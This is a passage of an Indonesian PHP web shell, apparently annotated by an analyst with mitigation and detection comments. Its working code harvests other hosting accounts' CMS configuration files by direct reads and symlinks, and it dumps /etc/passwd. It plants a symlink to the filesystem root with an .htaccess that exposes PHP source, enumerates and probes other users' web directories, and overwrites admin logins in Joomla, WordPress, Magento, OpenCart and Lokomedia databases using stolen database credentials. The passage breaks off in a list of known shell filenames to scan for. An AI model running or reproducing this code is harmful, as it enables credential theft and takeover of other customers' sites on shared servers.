  1718. "/home/$user_tokeichun/public_html/CLIENTS/submitticket.php" => "WHMCS",
  1719. "/home/$user_tokeichun/public_html/Clients/submitticket.php" => "WHMCS",
  1720. "/home/$user_tokeichun/public_html/clients/submitticket.php" => "WHMCS",
  1721. "/home/$user_tokeichun/public_html/BILLINGS/submitticket.php" => "WHMCS",
  1722. "/home/$user_tokeichun/public_html/Billings/submitticket.php" => "WHMCS",
  1723. "/home/$user_tokeichun/public_html/billings/submitticket.php" => "WHMCS",
  1724. "/home/$user_tokeichun/public_html/MY/submitticket.php" => "WHMCS",
  1725. "/home/$user_tokeichun/public_html/My/submitticket.php" => "WHMCS",
  1726. "/home/$user_tokeichun/public_html/my/submitticket.php" => "WHMCS",
  1727. "/home/$user_tokeichun/public_html/secure/whm/submitticket.php" => "WHMCS",
  1728. "/home/$user_tokeichun/public_html/secure/whmcs/submitticket.php" => "WHMCS",
  1729. "/home/$user_tokeichun/public_html/panel/submitticket.php" => "WHMCS",
  1730. "/home/$user_tokeichun/public_html/clientes/submitticket.php" => "WHMCS",
  1731. "/home/$user_tokeichun/public_html/cliente/submitticket.php" => "WHMCS",
  1732. "/home/$user_tokeichun/public_html/support/order/submitticket.php" => "WHMCS",
  1733. "/home/$user_tokeichun/public_html/bb-config.php" => "BoxBilling",
  1734. "/home/$user_tokeichun/public_html/boxbilling/bb-config.php" => "BoxBilling",
  1735. "/home/$user_tokeichun/public_html/box/bb-config.php" => "BoxBilling",
  1736. "/home/$user_tokeichun/public_html/host/bb-config.php" => "BoxBilling",
  1737. "/home/$user_tokeichun/public_html/Host/bb-config.php" => "BoxBilling",
  1738. "/home/$user_tokeichun/public_html/supportes/bb-config.php" => "BoxBilling",
  1739. "/home/$user_tokeichun/public_html/support/bb-config.php" => "BoxBilling",
  1740. "/home/$user_tokeichun/public_html/hosting/bb-config.php" => "BoxBilling",
  1741. "/home/$user_tokeichun/public_html/cart/bb-config.php" => "BoxBilling",
  1742. "/home/$user_tokeichun/public_html/order/bb-config.php" => "BoxBilling",
  1743. "/home/$user_tokeichun/public_html/client/bb-config.php" => "BoxBilling",
  1744. "/home/$user_tokeichun/public_html/clients/bb-config.php" => "BoxBilling",
  1745. "/home/$user_tokeichun/public_html/cliente/bb-config.php" => "BoxBilling",
  1746. "/home/$user_tokeichun/public_html/clientes/bb-config.php" => "BoxBilling",
  1747. "/home/$user_tokeichun/public_html/billing/bb-config.php" => "BoxBilling",
  1748. "/home/$user_tokeichun/public_html/billings/bb-config.php" => "BoxBilling",
  1749. "/home/$user_tokeichun/public_html/my/bb-config.php" => "BoxBilling",
  1750. "/home/$user_tokeichun/public_html/secure/bb-config.php" => "BoxBilling",
  1751. "/home/$user_tokeichun/public_html/support/order/bb-config.php" => "BoxBilling",
  1752. "/home/$user_tokeichun/public_html/includes/dist-configure.php" => "Zencart",
  1753. "/home/$user_tokeichun/public_html/zencart/includes/dist-configure.php" => "Zencart",
  1754. "/home/$user_tokeichun/public_html/products/includes/dist-configure.php" => "Zencart",
  1755. "/home/$user_tokeichun/public_html/cart/includes/dist-configure.php" => "Zencart",
  1756. "/home/$user_tokeichun/public_html/shop/includes/dist-configure.php" => "Zencart",
  1757. "/home/$user_tokeichun/public_html/includes/iso4217.php" => "Hostbills",
  1758. "/home/$user_tokeichun/public_html/hostbills/includes/iso4217.php" => "Hostbills",
  1759. "/home/$user_tokeichun/public_html/host/includes/iso4217.php" => "Hostbills",
  1760. "/home/$user_tokeichun/public_html/Host/includes/iso4217.php" => "Hostbills",
  1761. "/home/$user_tokeichun/public_html/supportes/includes/iso4217.php" => "Hostbills",
  1762. "/home/$user_tokeichun/public_html/support/includes/iso4217.php" => "Hostbills",
  1763. "/home/$user_tokeichun/public_html/hosting/includes/iso4217.php" => "Hostbills",
  1764. "/home/$user_tokeichun/public_html/cart/includes/iso4217.php" => "Hostbills",
  1765. "/home/$user_tokeichun/public_html/order/includes/iso4217.php" => "Hostbills",
  1766. "/home/$user_tokeichun/public_html/client/includes/iso4217.php" => "Hostbills",
  1767. "/home/$user_tokeichun/public_html/clients/includes/iso4217.php" => "Hostbills",
  1768. "/home/$user_tokeichun/public_html/cliente/includes/iso4217.php" => "Hostbills",
  1769. "/home/$user_tokeichun/public_html/clientes/includes/iso4217.php" => "Hostbills",
  1770. "/home/$user_tokeichun/public_html/billing/includes/iso4217.php" => "Hostbills",
  1771. "/home/$user_tokeichun/public_html/billings/includes/iso4217.php" => "Hostbills",
  1772. "/home/$user_tokeichun/public_html/my/includes/iso4217.php" => "Hostbills",
  1773. "/home/$user_tokeichun/public_html/secure/includes/iso4217.php" => "Hostbills",
  1774. "/home/$user_tokeichun/public_html/support/order/includes/iso4217.php" => "Hostbills"
  1775. );
  1776.  
  // Analyst note: per-account harvesting loop. $grab_config (built just above for
  // the current account name $user_tokeichun) maps candidate configuration file
  // paths under /home/<account>/ to a CMS/product label. Each candidate is handled
  // according to the POSTed "config" mode.
  // Mitigation (all modes): keep CMS configuration files readable by their owner
  // only, run each account's PHP under its own system user, confine PHP with
  // open_basedir per vhost, and use SymLinksIfOwnerMatch in the web server.
  1777. foreach($grab_config as $config => $nama_config) {
  // "grab": read the candidate directly; this only yields data when the PHP
  // process has read permission on the other account's file.
  1778. if($_POST['config'] == 'grab') {
  1779. $ambil_config = file_get_contents($config);
  1780. if($ambil_config == '') {
  1781. } else {
  // Non-empty content is copied to configg/<account>-<label>.txt.
  1782. $file_config = fopen("configg/$user_tokeichun-$nama_config.txt","w");
  1783. fputs($file_config,$ambil_config);
  1784. }
  1785. }
  // "symlink": no read happens here; a link symconfig/<account>-<label>.txt is
  // created and the content is fetched later through the web server.
  1786. if($_POST['config'] == 'symlink') {
  1787. @symlink($config,"symconfig/".$user_tokeichun."-".$nama_config.".txt");
  1788. }
  // "404": create the link under sym404/ and, only if that succeeded, build a
  // companion directory named <account>-<label>.txt404.
  1789. if($_POST['config'] == '404') {
  1790. $sym404=symlink($config,"sym404/".$user_tokeichun."-".$nama_config.".txt");
  1791. if($sym404){
  1792. @mkdir("sym404/".$user_tokeichun."-".$nama_config.".txt404", 0777);
  // The companion directory gets its own .htaccess: listing enabled, every entry
  // hidden (IndexIgnore *), and HeaderName set to tokeichun.txt. Presumably this is
  // meant to have the generated index page include the linked file as its header.
  1793. $htaccess="Options Indexes FollowSymLinks
  1794. DirectoryIndex tokeichun.htm
  1795. HeaderName tokeichun.txt
  1796. Satisfy Any
  1797. IndexOptions IgnoreCase FancyIndexing FoldersFirst NameWidth=* DescriptionWidth=* SuppressHTMLPreamble
  1798. IndexIgnore *";
  1799.  
  1800. @file_put_contents("sym404/".$user_tokeichun."-".$nama_config.".txt404/.htaccess",$htaccess);
  1801.  
  // Second link to the same target, named to match the HeaderName directive.
  1802. @symlink($config,"sym404/".$user_tokeichun."-".$nama_config.".txt404/tokeichun.txt");
  1803.  
  1804. }
  1805.  
  1806. }
  1807.  
  1808. }
  1809. } if($_POST['config'] == 'grab') {
  1810. echo "<center><a href='?dir=$dir/configg'><font color=lime>Done</font></a></center>";
  1811. }
  1812. if($_POST['config'] == '404') {
  1813. echo "<center>
  1814. <a href=\"sym404/root/\">SymlinkNya</a>
  1815. <br><a href=\"sym404/\">Configurations</a></center>";
  1816. }
  1817. if($_POST['config'] == 'symlink') {
  1818. echo "<center>
  1819. <a href=\"symconfig/root/\">Symlinknya</a>
  1820. <br><a href=\"symconfig/\">Configurations</a></center>";
  1821. }if($_POST['config'] == 'symvhost') {
  1822. echo "<center>
  1823. <a href=\"symvhost/root/\">Root Server</a>
  1824. <br><a href=\"symvhost/\">Configurations</a></center>";
  1825. }
  1826.  
  1827.  
  1828. }else{
  // Analyst note: input form of the config harvester, shown when no mode has been
  // submitted yet. The textarea is pre-filled with the server's account list and is
  // POSTed back as "passwd" together with the selected "config" mode.
  // Mitigation: an open_basedir restriction for the vhost keeps PHP from opening
  // /etc/passwd at this point.
  1829. echo "<form method=\"post\" action=\"\"><center>
  1830. </center></select><br><textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
  // include() on a file without PHP tags emits its text verbatim; the surrounding
  // echo then prints include's return value after it.
  1831. echo include("/etc/passwd");
  1832. echo "</textarea><br><br>
  1833. <select class=\"select\" name=\"config\" style=\"width: 450px;\" height=\"10\">
  1834. <option value=\"grab\">Config Grab</option>
  1835. <option value=\"symlink\">Symlink Config</option>
  1836. <option value=\"404\">Config 404</option>
  1837. <option value=\"symvhosts\">Vhosts Config Grabber</option><br><br><input type=\"submit\" value=\"Start!!\"></td></tr></center>\n";
  1838. }
  1839. }
  // Analyst note: "do=symlink" action. It plants a directory named "scripts" that
  // contains a symlink "root" -> "/" and an .htaccess serving .php as text/plain,
  // then prints a table of links of the form <path>/scripts/root/home/<user>/public_html.
  // Three sources are tried for the user list: /etc/named.conf, /etc/passwd, and a
  // UID sweep through posix_getpwuid(). exe() is a helper defined outside this
  // excerpt; from its use here it runs a shell command.
  // Detection: a "scripts" directory in a web root holding a "root" symlink to "/"
  // and an .htaccess with "AddType text/plain .php"; a short-lived "test.txt" next
  // to it; web requests whose path contains "/scripts/root/home/".
  // Mitigation: SymLinksIfOwnerMatch, restricted AllowOverride, open_basedir, and
  // disabling PHP's command-execution and symlink functions where not needed.
  1840. elseif($_GET['do'] == 'symlink') {
  // $full is $dir with the document root stripped, used as the URL prefix of the links.
  1841. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1842. $d0mains = @file("/etc/named.conf");
  1843. ##httaces
  // Source 1: /etc/named.conf was readable.
  1844. if($d0mains){
  1845. @mkdir("scripts",0777);
  1846. @chdir("scripts");
  1847. @exe("ln -s / root");
  1848. $file3 = 'Options Indexes FollowSymLinks
  1849. DirectoryIndex tokeichun.html
  1850. AddType text/plain .php
  1851. AddHandler text/plain .php
  1852. Satisfy Any';
  1853. $fp3 = fopen('.htaccess','w');
  1854. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  1855. echo "
  1856. <table align=center border=1 style='width:60%;border-color:#333333;'>
  1857. <tr>
  1858. <td align=center><font size=2>S. No.</font></td>
  1859. <td align=center><font size=2>Domains</font></td>
  1860. <td align=center><font size=2>Users</font></td>
  1861. <td align=center><font size=2>Symlink</font></td>
  1862. </tr>";
  1863. $dcount = 1;
  // For every line mentioning "zone", take the quoted zone name as a domain and
  // resolve the account that owns /etc/valiases/<domain> to obtain the user name.
  1864. foreach($d0mains as $d0main){
  1865. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  1866. flush();
  1867. if(strlen(trim($domains[1][0])) > 2){
  1868. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  1869. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  1870. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  1871. <td>".$user['name']."</td>
  1872. <td><a href='$full/scripts/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  1873. flush();
  1874. $dcount++;}}}
  1875. echo "</table>";
  1876. }else{
  // Source 2: named.conf was not readable, fall back to /etc/passwd.
  1877. $TEST=@file('/etc/passwd');
  1878. if ($TEST){
  1879. @mkdir("scripts",0777);
  1880. @chdir("scripts");
  1881. exe("ln -s / root");
  1882. $file3 = 'Options Indexes FollowSymLinks
  1883. DirectoryIndex tokeichun.html
  1884. AddType text/plain .php
  1885. AddHandler text/plain .php
  1886. Satisfy Any';
  1887. $fp3 = fopen('.htaccess','w');
  1888. $fw3 = fwrite($fp3,$file3);
  1889. @fclose($fp3);
  1890. echo "
  1891. <table align=center border=1><tr>
  1892. <td align=center><font size=3>S. No.</font></td>
  1893. <td align=center><font size=3>Users</font></td>
  1894. <td align=center><font size=3>Symlink</font></td></tr>";
  1895. $dcount = 1;
  // Each passwd line is matched for the text between the first "/" and the next
  // ":/" (the home directory field), "home/" is stripped, and entries that are
  // empty, longer than 12 characters or one of the listed system directories are skipped.
  1896. $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  1897. while(!feof($file)){
  1898. $s = fgets($file);
  1899. $matches = array();
  1900. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  1901. $matches = str_replace("home/","",$matches[1]);
  1902. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  1903. continue;
  1904. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  1905. <td align=center><font class=txt>" . $matches . "</td>";
  1906. echo "<td align=center><font class=txt><a href=$full/scripts/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  1907. $dcount++;}fclose($file);
  // Source 3 (else branch opening on the next line): /etc/passwd was not readable
  // either. When $os (set outside this excerpt) is not "Windows", the same staging
  // is repeated and the account list is rebuilt from a UID sweep.
  1908. echo "</table>";}else{if($os != "Windows"){@mkdir("scripts",0777);@chdir("scripts");@exe("ln -s / root");$file3 = '
  1909. Options Indexes FollowSymLinks
  1910. DirectoryIndex tokeichun.html
  1911. AddType text/plain .php
  1912. AddHandler text/plain .php
  1913. Satisfy Any
  1914. ';
  1915. $fp3 = fopen('.htaccess','w');
  1916. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  1917. echo "
  1918. <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
  1919. <table align=center border=1><tr>
  1920. <td align=center><font size=3>ID</font></td>
  1921. <td align=center><font size=3>Users</font></td>
  1922. <td align=center><font size=3>Symlink</font></td></tr>";
  // UIDs 0 through 1000 are looked up with posix_getpwuid(); each hit is joined
  // with ":" into passwd-like lines, written to test.txt, parsed with the same
  // filter as above, and test.txt is deleted at the end.
  1923. $temp = "";$val1 = 0;$val2 = 1000;
  1924. for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  1925. if ($uid)$temp .= join(':',$uid)."\n";}
  1926. echo '<br/>';$temp = trim($temp);$file5 =
  1927. fopen("test.txt","w");
  1928. fputs($file5,$temp);
  1929. fclose($file5);$dcount = 1;$file =
  1930. fopen("test.txt", "r") or exit("Unable to open file!");
  1931. while(!feof($file)){$s = fgets($file);$matches = array();
  1932. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  1933. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  1934. continue;
  1935. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  1936. <td align=center><font class=txt>" . $matches . "</td>";
  1937. echo "<td align=center><font class=txt><a href=$full/scripts/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  1938. $dcount++;}
  1939. fclose($file);
  1940. echo "</table></div></center>";unlink("test.txt");
  1941. } else
  1942. echo "<center><font size=3>Cannot create Symlink</font></center>";
  1943. }
  1944. }
  1945. }
  1946.  
  // Analyst note: "do=jumping" action. It walks /etc/passwd, derives
  // /home/<user>/public_html for every account name found before ":x:", and reports
  // which of those directories the PHP process can read ([R]) or also write ([RW]).
  // Each hit is printed as a link into the shell's own "?dir=" file browser.
  // Mitigation: home and public_html directories not accessible to other accounts
  // (owner plus web-server group only), per-account PHP users, and open_basedir.
  // Detection: a single web request that triggers stat/access calls across many
  // /home/*/public_html paths and repeated reads of /etc/named.conf.
  1947. elseif($_GET['do'] == 'jumping') {
  // $i counts the readable directories found.
  1948. $i = 0;
  1949. echo "<pre><div class='margin: 5px auto;'>";
  1950. $etc = fopen("/etc/passwd", "r");
  1951. while($passwd = fgets($etc)) {
  1952. if($passwd == '' || !$etc) {
  1953. echo "<font color=red>Can't read /etc/passwd</font>";
  1954. } else {
  1955. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  1956. foreach($user_jumping[1] as $user_idx_jump) {
  1957. $user_jumping_dir = "/home/$user_idx_jump/public_html";
  1958. if(is_readable($user_jumping_dir)) {
  1959. $i++;
  1960. $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a><br>";
  1961. if(is_writable($user_jumping_dir)) {
  1962. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a><br>";
  1963. }
  1964. echo $jrw;
  // For every readable directory, /etc/named.conf is read again and each zone file
  // name under /var/named/ is mapped to the owner of /etc/valiases/<domain>; the
  // first domain owned by the current account is printed next to the directory.
  1965. $domain_jump = file_get_contents("/etc/named.conf");
  1966. if($domain_jump == '') {
  1967. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  1968. } else {
  1969. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  1970. foreach($domains_jump[1] as $dj) {
  1971. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1972. $user_jumping_url = $user_jumping_url['name'];
  1973. if($user_jumping_url == $user_idx_jump) {
  1974. echo " => ( <u>$dj</u> )<br>";
  1975. break;
  1976. }
  1977. }
  1978. }
  1979. }
  1980. }
  1981. }
  1982. }
  // Summary line: number of readable directories and the resolved IP of the Host header.
  1983. if($i == 0) {
  1984. } else {
  1985. echo "<br>Total ada ".$i." Kimcil di ".gethostbyname($_SERVER['HTTP_HOST'])."";
  1986. }
  1987. echo "</div></pre>";
  1988.  
  1989. } elseif($_GET['do'] == 'auto_edit_user') {
  1990. if($_POST['hajar']) {
  1991. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  1992. echo "username atau password harus lebih dari 6 karakter";
  1993. } else {
  1994. $user_baru = $_POST['user_baru'];
  1995. $pass_baru = md5($_POST['pass_baru']);
  1996. $conf = $_POST['config_dir'];
  1997. $scan_conf = scandir($conf);
  1998. foreach($scan_conf as $file_conf) {
  1999. if(!is_file("$conf/$file_conf")) continue;
  2000. $config = file_get_contents("$conf/$file_conf");
  2001. if(preg_match("/JConfig|joomla/",$config)) {
  2002. $dbhost = ambilkata($config,"host = '","'");
  2003. $dbuser = ambilkata($config,"user = '","'");
  2004. $dbpass = ambilkata($config,"password = '","'");
  2005. $dbname = ambilkata($config,"db = '","'");
  2006. $dbprefix = ambilkata($config,"dbprefix = '","'");
  2007. $prefix = $dbprefix."users";
  2008. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2009. $db = mysql_select_db($dbname);
  2010. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2011. $result = mysql_fetch_array($q);
  2012. $id = $result['id'];
  2013. $site = ambilkata($config,"sitename = '","'");
  2014. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  2015. echo "Config => ".$file_conf."<br>";
  2016. echo "CMS => Joomla<br>";
  2017. if($site == '') {
  2018. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  2019. } else {
  2020. echo "Sitename => $site<br>";
  2021. }
  2022. if(!$update OR !$conn OR !$db) {
  2023. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2024. } else {
  2025. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2026. }
  2027. mysql_close($conn);
  2028. } elseif(preg_match("/WordPress/",$config)) {
  2029. $dbhost = ambilkata($config,"DB_HOST', '","'");
  2030. $dbuser = ambilkata($config,"DB_USER', '","'");
  2031. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2032. $dbname = ambilkata($config,"DB_NAME', '","'");
  2033. $dbprefix = ambilkata($config,"table_prefix = '","'");
  2034. $prefix = $dbprefix."users";
  2035. $option = $dbprefix."options";
  2036. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2037. $db = mysql_select_db($dbname);
  2038. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2039. $result = mysql_fetch_array($q);
  2040. $id = $result[ID];
  2041. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2042. $result2 = mysql_fetch_array($q2);
  2043. $target = $result2[option_value];
  2044. if($target == '') {
  2045. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2046. } else {
  2047. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  2048. }
  2049. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  2050. echo "Config => ".$file_conf."<br>";
  2051. echo "CMS => Wordpress<br>";
  2052. echo $url_target;
  2053. if(!$update OR !$conn OR !$db) {
  2054. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2055. } else {
  2056. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2057. }
  2058. mysql_close($conn);
  2059. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  2060. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  2061. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  2062. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  2063. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  2064. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  2065. $prefix = $dbprefix."admin_user";
  2066. $option = $dbprefix."core_config_data";
  2067. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2068. $db = mysql_select_db($dbname);
  2069. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  2070. $result = mysql_fetch_array($q);
  2071. $id = $result[user_id];
  2072. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  2073. $result2 = mysql_fetch_array($q2);
  2074. $target = $result2[value];
  2075. if($target == '') {
  2076. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2077. } else {
  2078. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  2079. }
  2080. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  2081. echo "Config => ".$file_conf."<br>";
  2082. echo "CMS => Magento<br>";
  2083. echo $url_target;
  2084. if(!$update OR !$conn OR !$db) {
  2085. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2086. } else {
  2087. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2088. }
  2089. mysql_close($conn);
  2090. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  2091. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  2092. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  2093. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  2094. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  2095. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  2096. $prefix = $dbprefix."user";
  2097. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2098. $db = mysql_select_db($dbname);
  2099. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  2100. $result = mysql_fetch_array($q);
  2101. $id = $result[user_id];
  2102. $target = ambilkata($config,"HTTP_SERVER', '","'");
  2103. if($target == '') {
  2104. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2105. } else {
  2106. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  2107. }
  2108. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  2109. echo "Config => ".$file_conf."<br>";
  2110. echo "CMS => OpenCart<br>";
  2111. echo $url_target;
  2112. if(!$update OR !$conn OR !$db) {
  2113. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2114. } else {
  2115. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2116. }
  2117. mysql_close($conn);
  2118. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  2119. $dbhost = ambilkata($config,'server = "','"');
  2120. $dbuser = ambilkata($config,'username = "','"');
  2121. $dbpass = ambilkata($config,'password = "','"');
  2122. $dbname = ambilkata($config,'database = "','"');
  2123. $prefix = "users";
  2124. $option = "identitas";
  2125. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2126. $db = mysql_select_db($dbname);
  2127. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  2128. $result = mysql_fetch_array($q);
  2129. $target = $result[alamat_website];
  2130. if($target == '') {
  2131. $target2 = $result[url];
  2132. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2133. if($target2 == '') {
  2134. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2135. } else {
  2136. $cek_login3 = file_get_contents("$target2/adminweb/");
  2137. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  2138. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  2139. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  2140. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  2141. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  2142. } else {
  2143. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  2144. }
  2145. }
  2146. } else {
  2147. $cek_login = file_get_contents("$target/adminweb/");
  2148. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  2149. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  2150. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  2151. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  2152. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  2153. } else {
  2154. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  2155. }
  2156. }
  2157. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  2158. echo "Config => ".$file_conf."<br>";
  2159. echo "CMS => Lokomedia<br>";
  2160. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  2161. echo $url_target2;
  2162. } else {
  2163. echo $url_target;
  2164. }
  2165. if(!$update OR !$conn OR !$db) {
  2166. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2167. } else {
  2168. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2169. }
  2170. mysql_close($conn);
  2171. }
  2172. }
  2173. }
  2174. } else {
  2175. echo "<center>
  2176. <h1>Auto Edit User Config</h1>
  2177. <form method='post'>
  2178. DIR Config: <br>
  2179. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  2180. Set User & Pass: <br>
  2181. <input type='text' name='user_baru' value='root@1337' placeholder='user_baru'><br>
  2182. <input type='text' name='pass_baru' value='root@1337' placeholder='pass_baru'><br>
  2183. <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  2184. </form>
  2185. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  2186. ";
  2187. }
  2188. }elseif($_GET['do'] == 'shelscan') {
  2189. echo'<center><h2>Shell Finder</h2>
  2190. <form action="" method="post">
  2191. <input type="text" size="50" name="traget" value="http://www.site.com/"/>
  2192. <br>
  2193. <input name="scan" value="Start Scaning" style="width: 215px;" type="submit">
  2194. </form><br>';
  2195. if (isset($_POST["scan"])) {
  2196. $url = $_POST['traget'];
  2197. echo "<br /><span class='start'>Scanning ".$url."<br /><br /></span>";
  2198. echo "Result :<br />";
  2199. $shells = array("WSO.php","dz.php","cpanel.php","cpn.php","sql.php","mysql.php","madspot.php","cp.php","cpbt.php","sYm.php",
  2200. "x.php","r99.php","lol.php","jo.php","wp.php","whmcs.php","shellz.php","d0main.php","d0mains.php","users.php",
  2201. "Cgishell.pl","killer.php","changeall.php","2.php","Sh3ll.php","dz0.php","dam.php","user.php","dom.php","whmcs.php",
  2202. "vb.zip","r00t.php","c99.php","gaza.php","1.php","wp.zip"."wp-content/plugins/disqus-comment-system/disqus.php",
  2203. "d0mains.php","wp-content/plugins/akismet/akismet.php","madspotshell.php","Sym.php","c22.php","c100.php",
  2204. "wp-content/plugins/akismet/admin.php#","wp-content/plugins/google-sitemap-generator/sitemap-core.php#",
  2205. "wp-content/plugins/akismet/widget.php#","Cpanel.php","zone-h.php","tmp/user.php","tmp/Sym.php","cp.php",
  2206. "tmp/madspotshell.php","tmp/root.php","tmp/whmcs.php","tmp/index.php","tmp/2.php","tmp/dz.php","tmp/cpn.php",
  2207. "tmp/changeall.php","tmp/Cgishell.pl","tmp/sql.php","tmp/admin.php","cliente/downloads/h4xor.php",
  2208. "whmcs/downloads/dz.php","L3b.php","d.php","tmp/d.php","tmp/L3b.php","wp-content/plugins/akismet/admin.php",
  2209. "templates/rhuk_milkyway/index.php","templates/beez/index.php","admin1.php","upload.php","up.php","vb.zip","vb.rar",
